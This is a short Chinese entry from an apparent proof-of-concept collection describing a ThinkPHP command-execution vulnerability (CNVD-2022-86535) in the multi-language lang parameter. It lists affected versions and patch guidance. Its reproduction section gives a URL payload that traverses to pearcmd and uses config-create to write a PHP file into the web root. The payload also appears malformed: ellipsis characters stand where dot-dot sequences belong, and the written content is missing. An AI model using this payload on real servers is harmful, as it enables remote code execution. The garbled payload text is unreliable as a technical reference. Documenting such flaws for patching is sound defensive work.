Awesome-POC/开发框架漏洞/ThinkPHP 命令执行漏洞 CNVD-2022-86535.md

ThinkPHP 命令执行漏洞 CNVD-2022-86535

漏洞描述

该漏洞是由于 Thinkphp 开启了多语言功能，并且对参数 lang 传参过滤不严谨，导致攻击者可利用该漏洞执行命令。

漏洞影响

ThinkPHP >=V6.0.1，<=V6.0.13
ThinkPHP >=V5.0.X，<=V5.1.X

漏洞复现

payload：

/index?lang=…/…/…/…/…/…/…/…/usr/local/lib/php/pearcmd&+config-create+/&/+/var/www/html/test.php

漏洞修复

官方已发布漏洞补丁及修复版本，可以评估业务是否受影响后，酌情升级至安全版本。

如不需要多语言功能，请及时关闭此功能，可参考官方文档：

• https://www.kancloud.cn/manual/thinkphp6_0/1037637
• https://static.kancloud.cn/manual/thinkphp5/118132